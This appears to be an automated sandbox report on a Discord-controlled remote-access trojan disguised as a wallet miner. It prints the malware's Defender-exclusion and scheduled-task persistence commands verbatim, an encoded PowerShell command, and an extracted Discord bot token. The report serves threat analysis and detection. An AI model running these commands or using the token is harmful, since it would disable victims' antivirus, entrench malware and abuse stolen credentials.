discordrat | cada552cf5b6543a9912f10595dd2f0e09439aae82807ab5c89c0530f709ebe1

Analysis

max time kernel
137s
max time network
128s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
26-11-2024 23:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Versal Wallet Miner.exe
Size

17.3MB
MD5

f14fd88ea6e9a20ee19a040258131eb0
SHA1

b9fcbc22750fc71d4e0d77bee73f983dd60c15df
SHA256

cada552cf5b6543a9912f10595dd2f0e09439aae82807ab5c89c0530f709ebe1
SHA512

c48446c60a2c3d895d13392a45949e572efdc9c61bce4bc1286c6cf1aabd5668d92d1a1f3c3a8e1dd247db943b562cf29f1854bf6774034d365dd80a067ce412
SSDEEP

393216:lqbrPQ+neovbHYi5P2LQHi9yAf6x0/u0cQzZo/0sH5JnivJM0tH:4brY+eo4i5PuQHi4L0/uiCPZJAa0

Score

10^/10

discordrat defense_evasion discovery execution persistence pyinstaller rat rootkit stealer upx

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTMwODc0NzE1MTI1MzE4MDU2OA.GbxO_D._a3OsoX5ZAA2u6bHkqnYVm1ylz4DH0RyRqIHUA
server_id
1308746945250066522

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1692	powershell.exe
2364	powershell.exe

Executes dropped EXE 8 IoCs

pid	Process
2016	tk.exe
2728	bind.exe
2792	Built.exe
2632	Client-built.exe
1740	Built.exe
1388	Process not Found
2880	tk.exe
2076	services64.exe

Loads dropped DLL 22 IoCs

pid	Process
2268	Versal Wallet Miner.exe
2268	Versal Wallet Miner.exe
2268	Versal Wallet Miner.exe
2268	Versal Wallet Miner.exe
2792	Built.exe
1740	Built.exe
2476	WerFault.exe
2476	WerFault.exe
2476	WerFault.exe
2476	WerFault.exe
2476	WerFault.exe
2016	tk.exe
2880	tk.exe
2880	tk.exe
2880	tk.exe
2880	tk.exe
2880	tk.exe
2880	tk.exe
2880	tk.exe
1388	Process not Found
1388	Process not Found
1972	cmd.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001a491-114.dat	upx
behavioral1/memory/1740-124-0x000007FEF5470000-0x000007FEF58DA000-memory.dmp	upx

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0009000000016ace-2.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Versal Wallet Miner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2516	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2532	powershell.exe
2376	conhost.exe
1692	powershell.exe
2364	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1740	Built.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	2376	conhost.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2268 wrote to memory of 2532	2268	Versal Wallet Miner.exe	31
PID 2268 wrote to memory of 2532	2268	Versal Wallet Miner.exe	31
PID 2268 wrote to memory of 2532	2268	Versal Wallet Miner.exe	31
PID 2268 wrote to memory of 2532	2268	Versal Wallet Miner.exe	31
PID 2268 wrote to memory of 2016	2268	Versal Wallet Miner.exe	33
PID 2268 wrote to memory of 2016	2268	Versal Wallet Miner.exe	33
PID 2268 wrote to memory of 2016	2268	Versal Wallet Miner.exe	33
PID 2268 wrote to memory of 2016	2268	Versal Wallet Miner.exe	33
PID 2268 wrote to memory of 2728	2268	Versal Wallet Miner.exe	34
PID 2268 wrote to memory of 2728	2268	Versal Wallet Miner.exe	34
PID 2268 wrote to memory of 2728	2268	Versal Wallet Miner.exe	34
PID 2268 wrote to memory of 2728	2268	Versal Wallet Miner.exe	34
PID 2268 wrote to memory of 2792	2268	Versal Wallet Miner.exe	35
PID 2268 wrote to memory of 2792	2268	Versal Wallet Miner.exe	35
PID 2268 wrote to memory of 2792	2268	Versal Wallet Miner.exe	35
PID 2268 wrote to memory of 2792	2268	Versal Wallet Miner.exe	35
PID 2268 wrote to memory of 2632	2268	Versal Wallet Miner.exe	36
PID 2268 wrote to memory of 2632	2268	Versal Wallet Miner.exe	36
PID 2268 wrote to memory of 2632	2268	Versal Wallet Miner.exe	36
PID 2268 wrote to memory of 2632	2268	Versal Wallet Miner.exe	36
PID 2792 wrote to memory of 1740	2792	Built.exe	37
PID 2792 wrote to memory of 1740	2792	Built.exe	37
PID 2792 wrote to memory of 1740	2792	Built.exe	37
PID 2632 wrote to memory of 2476	2632	Client-built.exe	38
PID 2632 wrote to memory of 2476	2632	Client-built.exe	38
PID 2632 wrote to memory of 2476	2632	Client-built.exe	38
PID 2016 wrote to memory of 2880	2016	tk.exe	39
PID 2016 wrote to memory of 2880	2016	tk.exe	39
PID 2016 wrote to memory of 2880	2016	tk.exe	39
PID 2728 wrote to memory of 2376	2728	bind.exe	41
PID 2728 wrote to memory of 2376	2728	bind.exe	41
PID 2728 wrote to memory of 2376	2728	bind.exe	41
PID 2728 wrote to memory of 2376	2728	bind.exe	41
PID 2376 wrote to memory of 2296	2376	conhost.exe	42
PID 2376 wrote to memory of 2296	2376	conhost.exe	42
PID 2376 wrote to memory of 2296	2376	conhost.exe	42
PID 2296 wrote to memory of 1692	2296	cmd.exe	44
PID 2296 wrote to memory of 1692	2296	cmd.exe	44
PID 2296 wrote to memory of 1692	2296	cmd.exe	44
PID 2376 wrote to memory of 1712	2376	conhost.exe	46
PID 2376 wrote to memory of 1712	2376	conhost.exe	46
PID 2376 wrote to memory of 1712	2376	conhost.exe	46
PID 1712 wrote to memory of 2516	1712	cmd.exe	48
PID 1712 wrote to memory of 2516	1712	cmd.exe	48
PID 1712 wrote to memory of 2516	1712	cmd.exe	48
PID 2296 wrote to memory of 2364	2296	cmd.exe	49
PID 2296 wrote to memory of 2364	2296	cmd.exe	49
PID 2296 wrote to memory of 2364	2296	cmd.exe	49
PID 2376 wrote to memory of 1972	2376	conhost.exe	50
PID 2376 wrote to memory of 1972	2376	conhost.exe	50
PID 2376 wrote to memory of 1972	2376	conhost.exe	50
PID 1972 wrote to memory of 2076	1972	cmd.exe	52
PID 1972 wrote to memory of 2076	1972	cmd.exe	52
PID 1972 wrote to memory of 2076	1972	cmd.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Versal Wallet Miner.exe
"C:\Users\Admin\AppData\Local\Temp\Versal Wallet Miner.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAZAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAeAB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZABiACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2532
- C:\Users\Admin\AppData\Local\Temp\tk.exe
  "C:\Users\Admin\AppData\Local\Temp\tk.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Users\Admin\AppData\Local\Temp\tk.exe
    "C:\Users\Admin\AppData\Local\Temp\tk.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2880
- C:\Users\Admin\AppData\Local\Temp\bind.exe
  "C:\Users\Admin\AppData\Local\Temp\bind.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bind.exe"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2376
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2296
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2364
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1712
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2516
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Windows\system32\services64.exe"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1972
    - - C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        5⤵
        Executes dropped EXE
        
        PID:2076
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: GetForegroundWindowSpam
    PID:1740
- C:\Users\Admin\AppData\Local\Temp\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2632 -s 596
    3⤵
    - Loads dropped DLL
    PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

Filesize
78KB

MD5
1cb84afe238e7074a68adf518638e138

SHA1
ad27759ddd719b6c1d26fc227a50607041ec04e4

SHA256
018cb02d86da049a38228bb0515ae0a7f5224980669959f2cfec563b8f4f3445

SHA512
47785cf65f53572e1dd544cc9361b4396337b5dc22ea45fa0c1ea7c3b0a77597e7946299c800cdbcd59bf64f08f72a73096ff776af508607e962eb01cecb3d48

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20162\api-ms-win-core-file-l1-2-0.dll

Filesize
22KB

MD5
852904535068e569e2b157f3bca0c08f

SHA1
c79b4d109178f4ab8c19ab549286eee4edf6eddb

SHA256
202b77cd363fce7c09d9a59b5779f701767c8734cc17bbe8b9ece5a0619f2225

SHA512
3e814678c7aa0d3d3a637ce3048e3b472dbb01b2e2a5932e5b257aa76bf8de8117a38e2a352daff66939a73c1b971b302f5635ea1d826b8a3afa49f9b543a541

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20162\api-ms-win-core-file-l2-1-0.dll

Filesize
22KB

MD5
cdfc83e189bda0ac9eab447671754e87

SHA1
cf597ee626366738d0ea1a1d8be245f26abbea72

SHA256
f4811f251c49c9ae75f9fe25890bacede852e4f1bfdc6685f49096253a43f007

SHA512
659ee46e210fcad6c778988a164ce3f69a137d05fb2699ff662540cbb281b38719017f1049d5189fafdae06c07a48d3d29dd98e11c1cae5d47768c243af37fe9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20162\api-ms-win-core-localization-l1-2-0.dll

Filesize
22KB

MD5
f1d0595773886d101e684e772118d1ef

SHA1
290276053a75cbeb794441965284b18311ab355d

SHA256
040e1572da9a980392184b1315f27ebcdaf07a0d94ddf49cbd0d499f7cdb099a

SHA512
db57f4ae78f7062cfe392d6829c5975be91d0062ff06725c45c06a74e04ade8bcaf709cfebeba8146fb4396206141aa49572968ea240aa1cba909e43985dc3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20162\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
22KB

MD5
e26a5e364a76bf00feaab920c535adbb

SHA1
411eaf1ca1d8f1aebcd816d93933561c927f2754

SHA256
b3c0356f64e583c8aca3b1284c6133540a8a12f94b74568fb78ddc36eac6ab15

SHA512
333e42eeea07a46db46f222e27429facaaf2ce8a433f0c39f5d5c72e67d894c813d3cf77880434f6373e0d8fffa3ef96d5f37e38dd4775491f3da2b569e9df59

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20162\api-ms-win-core-timezone-l1-1-0.dll

Filesize
22KB

MD5
566232dabd645dcd37961d7ec8fde687

SHA1
88a7a8c777709ae4b6d47bed6678d0192eb3bc3f

SHA256
1290d332718c47961052ebc97a3a71db2c746a55c035a32b72e5ff00eb422f96

SHA512
e5d549c461859445006a4083763ce855adbb72cf9a0bcb8958daa99e20b1ca8a82dec12e1062787e2ae8aee94224b0c92171a4d99ed348b94eab921ede205220

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20162\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20162\ucrtbase.dll

Filesize
1.1MB

MD5
a9f5b06fae677c9eb5be8b37d5fb1cb9

SHA1
5c37b880a1479445dd583f85c58a8790584f595d

SHA256
4e9e93fd6486571e1b5dce381fa536fb6c5593584d3330368ccd47ee6107bf52

SHA512
5d7664716fa52f407d56771862262317ac7f4a03f31f209333c3eea7f1c8cf3d5dbafc1942122948d19208d023df220407014f47e57694e70480a878822b779a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27922\python310.dll

Filesize
1.4MB

MD5
b3ae142a88ff3760a852ba7facb901bc

SHA1
ad23e5f2f0cc6415086d8c8273c356d35fa4e3ee

SHA256
2291ce67c4be953a0b7c56d790b6cc8075ec8166b1b2e05d71f684c59fdd91a5

SHA512
3b60b8b7197079d629d01440ed78a589c6a18803cc63cdeac1382dc76201767f18190e694d2c1839a72f6318e39dba6217c48a130903f72e47fa1db504810c1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\bind.exe

Filesize
2.1MB

MD5
0b5fd844b8cc004c182a6a2fb3f65ba5

SHA1
50025e398def140cfac62cde8a4dd1e1218e4e2e

SHA256
6690ebc99bbe1a22a60e3f97733f1dcbb74bec4a7161a892f3f190f30e4bf1c9

SHA512
2b608beb42eec043e0cfe1e4f1425308add14b7422aedd2f7f305854fc093ca85c87e348e296e2ff1d4580af119ba1d4898d75c66f7a29aeaa6f9a3aba73de6f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BPVGR0NEURPI49MBZMRN.temp

Filesize
7KB

MD5
90aa4d225e69f11211f39fbac706bae3

SHA1
58b1cb4abe19d5bec6c46e07b99acbb90de9d97e

SHA256
c9e10d62357cc2bab55062f683e2bccab37774c95a8909ba1d5eb01cf08c71cc

SHA512
fb7c8f575db3d1a98523e8b42b68a0a4039ed5ffb603ddebc73703eabcc0ed544ebb3cc905f82aebc92e91b164d9afff9e7674ea1bde9e8f90824d14705dc6ec

Download Submit
\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
5.8MB

MD5
951604a87ebb08dfc865c263d65ec590

SHA1
bbacc1f2038dddd74a691dd07c3cb48090823f4b

SHA256
5fc9274dfc3efba1ffeabb3b7a5ab73e1c6de9b5fc9272a3e05adf82890a6510

SHA512
0b3747519b72a0dc8989c05509a50987621c5ca8c957c3cd70c0eb381320fb2c507e4811559f6ce44cff79faa4bd79712afce63354af81cf8f72445c1bfa9791

Download Submit
\Users\Admin\AppData\Local\Temp\tk.exe

Filesize
9.0MB

MD5
fb897a431592d22e5988eb1f39ac32c4

SHA1
8349b99679c4e839d2e264214d779883963ff887

SHA256
2df532f3b66e68f6eb48430a70b06cbf29a29341e103c939a6204f7d6050fb20

SHA512
3ce57c10fd894a7c7ac78d0515e7c2e60c56de9e76a7701d1f5681dda148b67fe6f0debc40674af54d6594998bfa1b0f2e1a8ac22c19971c08fe61e58582b2be

Download Submit
memory/1692-1057-0x0000000002110000-0x0000000002118000-memory.dmp

Filesize
32KB

Download
memory/1692-1056-0x000000001B3A0000-0x000000001B682000-memory.dmp

Filesize
2.9MB

Download
memory/1740-124-0x000007FEF5470000-0x000007FEF58DA000-memory.dmp

Filesize
4.4MB

Download
memory/2364-1064-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

Filesize
2.9MB

Download
memory/2364-1065-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/2376-1051-0x000000001B470000-0x000000001B690000-memory.dmp

Filesize
2.1MB

Download
memory/2376-1050-0x00000000000B0000-0x00000000002D1000-memory.dmp

Filesize
2.1MB

Download
memory/2632-315-0x000000013FC70000-0x000000013FC88000-memory.dmp

Filesize
96KB

Download